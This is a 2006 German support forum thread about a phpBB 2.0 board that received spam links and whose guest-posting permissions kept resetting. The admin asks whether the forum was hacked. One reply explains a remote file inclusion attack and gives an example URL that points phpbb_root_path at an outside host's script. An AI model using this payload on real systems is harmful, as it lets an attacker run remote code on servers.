Hy,
wir hatten bei uns im Forum die letzten Tage 2 Beiträge, einmal ein Link zu diversen Sexseiten, ein anderes mal eine Linkliste zu Online Pharmacie, mit Medikamenten, die unter das Betäubungsmittelgesetz fallen. Daraufin habe ich eben meinen Server untersucht, und auf der Systemebene im ich mir relativ sicher, das mir hier keiner eingebrochen ist. Auch an den Dateien der Forensoftware und den eigenen Webseiten wurde keine veränderung durchgeführt. PHPbb ist eigenltihc auch auf dem aktuellen Stand, die eingebauten MODS auch.
Weiss da jemand, ob im Moment gerade was los ist?
danke euch
Forum gehackt?
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Forum gehackt?
Zuletzt geändert von reinsle am 20.03.2006 09:26, insgesamt 2-mal geändert.
Das sieht mir nach 'einfachem' Spam aus.
Gruß, Philipp
Gruß, Philipp
Kein Support per PN!
Der Sozialstaat ist [...] eine zivilisatorische Errungenschaft, auf die wir stolz sein können. Aber der Sozialstaat heutiger Prägung hat sich übernommen. Das ist bitter, aber wahr. (Horst Köhler)
Meine Mods
Der Sozialstaat ist [...] eine zivilisatorische Errungenschaft, auf die wir stolz sein können. Aber der Sozialstaat heutiger Prägung hat sich übernommen. Das ist bitter, aber wahr. (Horst Köhler)
Meine Mods
Hast du mal 'nen Link zum Board?
Gruß, Philipp
Gruß, Philipp
Kein Support per PN!
Der Sozialstaat ist [...] eine zivilisatorische Errungenschaft, auf die wir stolz sein können. Aber der Sozialstaat heutiger Prägung hat sich übernommen. Das ist bitter, aber wahr. (Horst Köhler)
Meine Mods
Der Sozialstaat ist [...] eine zivilisatorische Errungenschaft, auf die wir stolz sein können. Aber der Sozialstaat heutiger Prägung hat sich übernommen. Das ist bitter, aber wahr. (Horst Köhler)
Meine Mods
-
PeterSwiss
- Mitglied
- Beiträge: 8
- Registriert: 04.03.2006 16:53
das folgende sollte eigentlich unnötig sein. Wenn im php.ini
register_globals=On ist, und
allow_url_fopen=On,
dann kann das BB mit dem dümmsten aller einfachen Tricks aufgebrochen werden. Ich sah solche Angriffe (im Log, nicht im BB), und ein Blick in index.php zeigt, dass es sogar noch einfacher geht als im Log:
http : //website.tld/forum?phpbb_root_path=http://ichmachewasichwillextension.inc
Abgesehen davon dass im Fall der Original Frage der Poster sich als "Gast" registrieren kann
register_globals=On ist, und
allow_url_fopen=On,
dann kann das BB mit dem dümmsten aller einfachen Tricks aufgebrochen werden. Ich sah solche Angriffe (im Log, nicht im BB), und ein Blick in index.php zeigt, dass es sogar noch einfacher geht als im Log:
http : //website.tld/forum?phpbb_root_path=http://ichmachewasichwillextension.inc
Abgesehen davon dass im Fall der Original Frage der Poster sich als "Gast" registrieren kann
Hy,
@philip:
http://forum.casablitzblanca.de/phpbb/index.php
@Peter: RegisterGlobals ist natürlich off.
@philip:
http://forum.casablitzblanca.de/phpbb/index.php
@Peter: RegisterGlobals ist natürlich off.
Hy,
jetzt hab ich doch etwas neuere Kentnisse. Die besagte Linksliste der Sexforen sidn ja bei uns aufgetaucht, daraufhin hat eine Adminkollegin geschaut, wie die Foreneinstellungen sind, in bezug auf Posten von nichtregistrierten. Da hat sie es umgestellt auf registrierte. Als ich dann wieder geschaut hab ... wars wieder auf alle.
Gibt es einen Exploit, der die Rechteeinstellungen beeinflussen kann?
jetzt hab ich doch etwas neuere Kentnisse. Die besagte Linksliste der Sexforen sidn ja bei uns aufgetaucht, daraufhin hat eine Adminkollegin geschaut, wie die Foreneinstellungen sind, in bezug auf Posten von nichtregistrierten. Da hat sie es umgestellt auf registrierte. Als ich dann wieder geschaut hab ... wars wieder auf alle.
Gibt es einen Exploit, der die Rechteeinstellungen beeinflussen kann?
